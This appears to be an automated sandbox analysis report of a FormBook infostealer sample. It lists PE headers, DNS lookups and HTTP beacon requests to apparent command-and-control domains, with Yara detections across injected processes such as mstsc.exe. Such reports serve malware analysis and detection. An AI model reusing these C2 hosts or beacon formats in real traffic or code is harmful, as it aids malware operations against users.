                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al

                                                                                                  Data Directories

                                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0xba6b00x4b.text
                                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0xbc0000x46e6.rsrc
                                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0xc20000xc.reloc
                                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                  Sections

                                                                                                  NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                  .text0x20000xb87040xb8800False0.55824705708data5.61495245399IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                  .rsrc0xbc0000x46e60x4800False0.153917100694data2.48496463764IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                  .reloc0xc20000xc0x200False0.041015625data0.0815394123432IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                  Resources

                                                                                                  NameRVASizeTypeLanguageCountry
                                                                                                  RT_ICON0xbc1300x4028data
                                                                                                  RT_GROUP_ICON0xc01580x14data
                                                                                                  RT_VERSION0xc016c0x390data
                                                                                                  RT_MANIFEST0xc04fc0x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                                                                                  Imports

                                                                                                  DLLImport
                                                                                                  mscoree.dll_CorExeMain

                                                                                                  Version Infos

                                                                                                  DescriptionData
                                                                                                  Translation0x0000 0x04b0
                                                                                                  LegalCopyrightCopyright 2003 4IJ<EF<2H2?B5?<65J5
                                                                                                  Assembly Version1.0.0.0
                                                                                                  InternalNameIMG_4785.exe
                                                                                                  FileVersion4.7.9.11
                                                                                                  CompanyName4IJ<EF<2H2?B5?<65J5
                                                                                                  CommentsAE6B@7::I5B26:CFAD:
                                                                                                  ProductName5DC7?JD?CD=C<8::@2I
                                                                                                  ProductVersion4.7.9.11
                                                                                                  FileDescription5DC7?JD?CD=C<8::@2I
                                                                                                  OriginalFilenameIMG_4785.exe

                                                                                                  Network Behavior

                                                                                                  Snort IDS Alerts

                                                                                                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                  01/26/21-19:17:56.119248TCP1201ATTACK-RESPONSES 403 Forbidden804977534.102.136.180192.168.2.4
                                                                                                  01/26/21-19:18:16.574495TCP1201ATTACK-RESPONSES 403 Forbidden804977734.102.136.180192.168.2.4

                                                                                                  Network Port Distribution

                                                                                                  TCP Packets

                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                  Jan 26, 2021 19:17:55.940206051 CET4977580192.168.2.434.102.136.180
                                                                                                  Jan 26, 2021 19:17:55.980139971 CET804977534.102.136.180192.168.2.4
                                                                                                  Jan 26, 2021 19:17:55.980253935 CET4977580192.168.2.434.102.136.180
                                                                                                  Jan 26, 2021 19:17:55.980583906 CET4977580192.168.2.434.102.136.180
                                                                                                  Jan 26, 2021 19:17:56.020441055 CET804977534.102.136.180192.168.2.4
                                                                                                  Jan 26, 2021 19:17:56.119247913 CET804977534.102.136.180192.168.2.4
                                                                                                  Jan 26, 2021 19:17:56.119296074 CET804977534.102.136.180192.168.2.4
                                                                                                  Jan 26, 2021 19:17:56.119566917 CET4977580192.168.2.434.102.136.180
                                                                                                  Jan 26, 2021 19:17:56.119647026 CET4977580192.168.2.434.102.136.180
                                                                                                  Jan 26, 2021 19:17:56.159765959 CET804977534.102.136.180192.168.2.4
                                                                                                  Jan 26, 2021 19:18:16.393987894 CET4977780192.168.2.434.102.136.180
                                                                                                  Jan 26, 2021 19:18:16.435101986 CET804977734.102.136.180192.168.2.4
                                                                                                  Jan 26, 2021 19:18:16.435297966 CET4977780192.168.2.434.102.136.180
                                                                                                  Jan 26, 2021 19:18:16.435353041 CET4977780192.168.2.434.102.136.180
                                                                                                  Jan 26, 2021 19:18:16.476150036 CET804977734.102.136.180192.168.2.4
                                                                                                  Jan 26, 2021 19:18:16.574495077 CET804977734.102.136.180192.168.2.4
                                                                                                  Jan 26, 2021 19:18:16.574590921 CET804977734.102.136.180192.168.2.4
                                                                                                  Jan 26, 2021 19:18:16.574881077 CET4977780192.168.2.434.102.136.180
                                                                                                  Jan 26, 2021 19:18:16.574917078 CET4977780192.168.2.434.102.136.180
                                                                                                  Jan 26, 2021 19:18:16.615082026 CET804977734.102.136.180192.168.2.4

                                                                                                  UDP Packets

                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                  Jan 26, 2021 19:15:27.024445057 CET6315353192.168.2.48.8.8.8
                                                                                                  Jan 26, 2021 19:15:27.081223965 CET53631538.8.8.8192.168.2.4
                                                                                                  Jan 26, 2021 19:15:28.005300045 CET5299153192.168.2.48.8.8.8
                                                                                                  Jan 26, 2021 19:15:28.055263042 CET53529918.8.8.8192.168.2.4
                                                                                                  Jan 26, 2021 19:15:28.874692917 CET5370053192.168.2.48.8.8.8
                                                                                                  Jan 26, 2021 19:15:28.923250914 CET53537008.8.8.8192.168.2.4
                                                                                                  Jan 26, 2021 19:15:29.776381969 CET5172653192.168.2.48.8.8.8
                                                                                                  Jan 26, 2021 19:15:29.824234009 CET53517268.8.8.8192.168.2.4
                                                                                                  Jan 26, 2021 19:15:30.749382973 CET5679453192.168.2.48.8.8.8
                                                                                                  Jan 26, 2021 19:15:30.797584057 CET53567948.8.8.8192.168.2.4
                                                                                                  Jan 26, 2021 19:15:31.740092039 CET5653453192.168.2.48.8.8.8
                                                                                                  Jan 26, 2021 19:15:31.787905931 CET53565348.8.8.8192.168.2.4
                                                                                                  Jan 26, 2021 19:15:32.632246017 CET5662753192.168.2.48.8.8.8
                                                                                                  Jan 26, 2021 19:15:32.684386969 CET53566278.8.8.8192.168.2.4
                                                                                                  Jan 26, 2021 19:15:32.696290016 CET5662153192.168.2.48.8.8.8
                                                                                                  Jan 26, 2021 19:15:32.747148037 CET53566218.8.8.8192.168.2.4
                                                                                                  Jan 26, 2021 19:15:33.686146975 CET6311653192.168.2.48.8.8.8
                                                                                                  Jan 26, 2021 19:15:33.734003067 CET53631168.8.8.8192.168.2.4
                                                                                                  Jan 26, 2021 19:15:34.584127903 CET6407853192.168.2.48.8.8.8
                                                                                                  Jan 26, 2021 19:15:34.635238886 CET53640788.8.8.8192.168.2.4
                                                                                                  Jan 26, 2021 19:15:35.543693066 CET6480153192.168.2.48.8.8.8
                                                                                                  Jan 26, 2021 19:15:35.595021009 CET53648018.8.8.8192.168.2.4
                                                                                                  Jan 26, 2021 19:15:36.322415113 CET6172153192.168.2.48.8.8.8
                                                                                                  Jan 26, 2021 19:15:36.370259047 CET53617218.8.8.8192.168.2.4
                                                                                                  Jan 26, 2021 19:15:37.251609087 CET5125553192.168.2.48.8.8.8
                                                                                                  Jan 26, 2021 19:15:37.302993059 CET53512558.8.8.8192.168.2.4
                                                                                                  Jan 26, 2021 19:15:51.065363884 CET6152253192.168.2.48.8.8.8
                                                                                                  Jan 26, 2021 19:15:51.116044044 CET53615228.8.8.8192.168.2.4
                                                                                                  Jan 26, 2021 19:15:57.363372087 CET5233753192.168.2.48.8.8.8
                                                                                                  Jan 26, 2021 19:15:57.423877001 CET53523378.8.8.8192.168.2.4
                                                                                                  Jan 26, 2021 19:16:14.392684937 CET5504653192.168.2.48.8.8.8
                                                                                                  Jan 26, 2021 19:16:14.440687895 CET53550468.8.8.8192.168.2.4
                                                                                                  Jan 26, 2021 19:16:16.078816891 CET4961253192.168.2.48.8.8.8
                                                                                                  Jan 26, 2021 19:16:16.137025118 CET53496128.8.8.8192.168.2.4
                                                                                                  Jan 26, 2021 19:16:19.638396978 CET4928553192.168.2.48.8.8.8
                                                                                                  Jan 26, 2021 19:16:19.702785969 CET53492858.8.8.8192.168.2.4
                                                                                                  Jan 26, 2021 19:16:20.697467089 CET5060153192.168.2.48.8.8.8
                                                                                                  Jan 26, 2021 19:16:20.773297071 CET53506018.8.8.8192.168.2.4
                                                                                                  Jan 26, 2021 19:16:21.516798019 CET6087553192.168.2.48.8.8.8
                                                                                                  Jan 26, 2021 19:16:21.576582909 CET53608758.8.8.8192.168.2.4
                                                                                                  Jan 26, 2021 19:16:22.527643919 CET5644853192.168.2.48.8.8.8
                                                                                                  Jan 26, 2021 19:16:22.587239027 CET53564488.8.8.8192.168.2.4
                                                                                                  Jan 26, 2021 19:16:24.613257885 CET5917253192.168.2.48.8.8.8
                                                                                                  Jan 26, 2021 19:16:24.664139986 CET53591728.8.8.8192.168.2.4
                                                                                                  Jan 26, 2021 19:16:25.417870045 CET6242053192.168.2.48.8.8.8
                                                                                                  Jan 26, 2021 19:16:25.474555016 CET53624208.8.8.8192.168.2.4
                                                                                                  Jan 26, 2021 19:16:26.287581921 CET6057953192.168.2.48.8.8.8
                                                                                                  Jan 26, 2021 19:16:26.348815918 CET53605798.8.8.8192.168.2.4
                                                                                                  Jan 26, 2021 19:16:27.186872005 CET5018353192.168.2.48.8.8.8
                                                                                                  Jan 26, 2021 19:16:27.245357037 CET53501838.8.8.8192.168.2.4
                                                                                                  Jan 26, 2021 19:16:28.412652969 CET6153153192.168.2.48.8.8.8
                                                                                                  Jan 26, 2021 19:16:28.463732958 CET53615318.8.8.8192.168.2.4
                                                                                                  Jan 26, 2021 19:16:30.456523895 CET4922853192.168.2.48.8.8.8
                                                                                                  Jan 26, 2021 19:16:30.521622896 CET53492288.8.8.8192.168.2.4
                                                                                                  Jan 26, 2021 19:16:31.110861063 CET5979453192.168.2.48.8.8.8
                                                                                                  Jan 26, 2021 19:16:31.169318914 CET53597948.8.8.8192.168.2.4
                                                                                                  Jan 26, 2021 19:16:32.605475903 CET5591653192.168.2.48.8.8.8
                                                                                                  Jan 26, 2021 19:16:32.665482044 CET53559168.8.8.8192.168.2.4
                                                                                                  Jan 26, 2021 19:16:43.212677002 CET5275253192.168.2.48.8.8.8
                                                                                                  Jan 26, 2021 19:16:43.263365030 CET53527528.8.8.8192.168.2.4
                                                                                                  Jan 26, 2021 19:17:11.886284113 CET6054253192.168.2.48.8.8.8
                                                                                                  Jan 26, 2021 19:17:11.937151909 CET53605428.8.8.8192.168.2.4
                                                                                                  Jan 26, 2021 19:17:20.125094891 CET6068953192.168.2.48.8.8.8
                                                                                                  Jan 26, 2021 19:17:20.197899103 CET53606898.8.8.8192.168.2.4
                                                                                                  Jan 26, 2021 19:17:20.284976959 CET6420653192.168.2.48.8.8.8
                                                                                                  Jan 26, 2021 19:17:20.334652901 CET53642068.8.8.8192.168.2.4
                                                                                                  Jan 26, 2021 19:17:33.544280052 CET5090453192.168.2.48.8.8.8
                                                                                                  Jan 26, 2021 19:17:33.613106966 CET53509048.8.8.8192.168.2.4
                                                                                                  Jan 26, 2021 19:17:46.438988924 CET5752553192.168.2.48.8.8.8
                                                                                                  Jan 26, 2021 19:17:46.487060070 CET53575258.8.8.8192.168.2.4
                                                                                                  Jan 26, 2021 19:17:53.906111956 CET5381453192.168.2.48.8.8.8
                                                                                                  Jan 26, 2021 19:17:53.976504087 CET53538148.8.8.8192.168.2.4
                                                                                                  Jan 26, 2021 19:17:55.874610901 CET5341853192.168.2.48.8.8.8
                                                                                                  Jan 26, 2021 19:17:55.935830116 CET53534188.8.8.8192.168.2.4
                                                                                                  Jan 26, 2021 19:18:02.336050034 CET6283353192.168.2.48.8.8.8
                                                                                                  Jan 26, 2021 19:18:02.385848999 CET53628338.8.8.8192.168.2.4
                                                                                                  Jan 26, 2021 19:18:16.327147961 CET5926053192.168.2.48.8.8.8
                                                                                                  Jan 26, 2021 19:18:16.391833067 CET53592608.8.8.8192.168.2.4
                                                                                                  Jan 26, 2021 19:18:29.608736992 CET4994453192.168.2.48.8.8.8
                                                                                                  Jan 26, 2021 19:18:29.656579971 CET53499448.8.8.8192.168.2.4
                                                                                                  Jan 26, 2021 19:18:36.704664946 CET6330053192.168.2.48.8.8.8
                                                                                                  Jan 26, 2021 19:18:36.765784025 CET53633008.8.8.8192.168.2.4

                                                                                                  DNS Queries

                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                  Jan 26, 2021 19:17:20.125094891 CET192.168.2.48.8.8.80x5a89Standard query (0)www.thesunchronical.comA (IP address)IN (0x0001)
                                                                                                  Jan 26, 2021 19:17:33.544280052 CET192.168.2.48.8.8.80x10beStandard query (0)www.serenityhomedits.comA (IP address)IN (0x0001)
                                                                                                  Jan 26, 2021 19:17:55.874610901 CET192.168.2.48.8.8.80x2879Standard query (0)www.g2vies.comA (IP address)IN (0x0001)
                                                                                                  Jan 26, 2021 19:18:16.327147961 CET192.168.2.48.8.8.80x706cStandard query (0)www.edu4go.comA (IP address)IN (0x0001)
                                                                                                  Jan 26, 2021 19:18:36.704664946 CET192.168.2.48.8.8.80xd061Standard query (0)www.infomgt.netA (IP address)IN (0x0001)

                                                                                                  DNS Answers

                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                  Jan 26, 2021 19:17:20.197899103 CET8.8.8.8192.168.2.40x5a89Name error (3)www.thesunchronical.comnonenoneA (IP address)IN (0x0001)
                                                                                                  Jan 26, 2021 19:17:33.613106966 CET8.8.8.8192.168.2.40x10beName error (3)www.serenityhomedits.comnonenoneA (IP address)IN (0x0001)
                                                                                                  Jan 26, 2021 19:17:55.935830116 CET8.8.8.8192.168.2.40x2879No error (0)www.g2vies.comg2vies.comCNAME (Canonical name)IN (0x0001)
                                                                                                  Jan 26, 2021 19:17:55.935830116 CET8.8.8.8192.168.2.40x2879No error (0)g2vies.com34.102.136.180A (IP address)IN (0x0001)
                                                                                                  Jan 26, 2021 19:18:16.391833067 CET8.8.8.8192.168.2.40x706cNo error (0)www.edu4go.comedu4go.comCNAME (Canonical name)IN (0x0001)
                                                                                                  Jan 26, 2021 19:18:16.391833067 CET8.8.8.8192.168.2.40x706cNo error (0)edu4go.com34.102.136.180A (IP address)IN (0x0001)
                                                                                                  Jan 26, 2021 19:18:36.765784025 CET8.8.8.8192.168.2.40xd061No error (0)www.infomgt.net188.166.214.231A (IP address)IN (0x0001)

                                                                                                  HTTP Request Dependency Graph

                                                                                                  • www.g2vies.com
                                                                                                  • www.edu4go.com

                                                                                                  HTTP Packets

                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                  0192.168.2.44977534.102.136.18080C:\Windows\explorer.exe
                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                  Jan 26, 2021 19:17:55.980583906 CET5680OUTGET /bsl/?2d=hxlpdRkxCvtTgBzP&mt=B72SzM4OK6YheLE+tS6SAH+1fBRAvDBThfWED1RPUqC7thw4cowf+3ukjA/mpLG53kNi HTTP/1.1
                                                                                                  Host: www.g2vies.com
                                                                                                  Connection: close
                                                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                                                  Data Ascii:
                                                                                                  Jan 26, 2021 19:17:56.119247913 CET5681INHTTP/1.1 403 Forbidden
                                                                                                  Server: openresty
                                                                                                  Date: Tue, 26 Jan 2021 18:17:56 GMT
                                                                                                  Content-Type: text/html
                                                                                                  Content-Length: 275
                                                                                                  ETag: "600b4d46-113"
                                                                                                  Via: 1.1 google
                                                                                                  Connection: close
                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                                  Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                  1192.168.2.44977734.102.136.18080C:\Windows\explorer.exe
                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                  Jan 26, 2021 19:18:16.435353041 CET5713OUTGET /bsl/?mt=meRO04KZ+tRueejEQ1mKApUC+xiZQAGZPTeO6WstMPZoEBgumINoRWRpGBFK3WkMjtLu&2d=hxlpdRkxCvtTgBzP HTTP/1.1
                                                                                                  Host: www.edu4go.com
                                                                                                  Connection: close
                                                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                                                  Data Ascii:
                                                                                                  Jan 26, 2021 19:18:16.574495077 CET5714INHTTP/1.1 403 Forbidden
                                                                                                  Server: openresty
                                                                                                  Date: Tue, 26 Jan 2021 18:18:16 GMT
                                                                                                  Content-Type: text/html
                                                                                                  Content-Length: 275
                                                                                                  ETag: "600b4d54-113"
                                                                                                  Via: 1.1 google
                                                                                                  Connection: close
                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                                  Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                                  Code Manipulations

                                                                                                  Statistics

                                                                                                  Behavior

                                                                                                  Click to jump to process

                                                                                                  System Behavior

                                                                                                  General

                                                                                                  Start time:19:15:30
                                                                                                  Start date:26/01/2021
                                                                                                  Path:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe'
                                                                                                  Imagebase:0x10000
                                                                                                  File size:775168 bytes
                                                                                                  MD5 hash:25FCC01067CABBF5D1AA3A2F8B18ED50
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:.Net C# or VB.NET
                                                                                                  Yara matches:
                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.686008623.0000000003DFA000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.686008623.0000000003DFA000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.686008623.0000000003DFA000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.686170457.0000000003F66000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.686170457.0000000003F66000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.686170457.0000000003F66000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                  Reputation:low

                                                                                                  General

                                                                                                  Start time:19:15:36
                                                                                                  Start date:26/01/2021
                                                                                                  Path:C:\Users\user\AppData\Local\Temp\AddInProcess32.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:C:\Users\user\AppData\Local\Temp\AddInProcess32.exe
                                                                                                  Imagebase:0x710000
                                                                                                  File size:42080 bytes
                                                                                                  MD5 hash:F2A47587431C466535F3C3D3427724BE
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Yara matches:
                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.721240186.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.721240186.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.721240186.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.721927497.0000000001090000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.721927497.0000000001090000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.721927497.0000000001090000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.722073173.00000000010C0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.722073173.00000000010C0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.722073173.00000000010C0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                  Antivirus matches:
                                                                                                  • Detection: 0%, Metadefender, Browse
                                                                                                  • Detection: 0%, ReversingLabs
                                                                                                  Reputation:moderate

                                                                                                  General

                                                                                                  Start time:19:15:41
                                                                                                  Start date:26/01/2021
                                                                                                  Path:C:\Windows\explorer.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:
                                                                                                  Imagebase:0x7ff6fee60000
                                                                                                  File size:3933184 bytes
                                                                                                  MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high

                                                                                                  General

                                                                                                  Start time:19:15:54
                                                                                                  Start date:26/01/2021
                                                                                                  Path:C:\Windows\SysWOW64\mstsc.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:C:\Windows\SysWOW64\mstsc.exe
                                                                                                  Imagebase:0xab0000
                                                                                                  File size:3444224 bytes
                                                                                                  MD5 hash:2412003BE253A515C620CE4890F3D8F3
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Yara matches:
                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.1028284186.0000000000A30000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.1028284186.0000000000A30000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.1028284186.0000000000A30000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.1027686906.00000000008F0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.1027686906.00000000008F0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.1027686906.00000000008F0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.1025912109.0000000000140000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.1025912109.0000000000140000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.1025912109.0000000000140000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
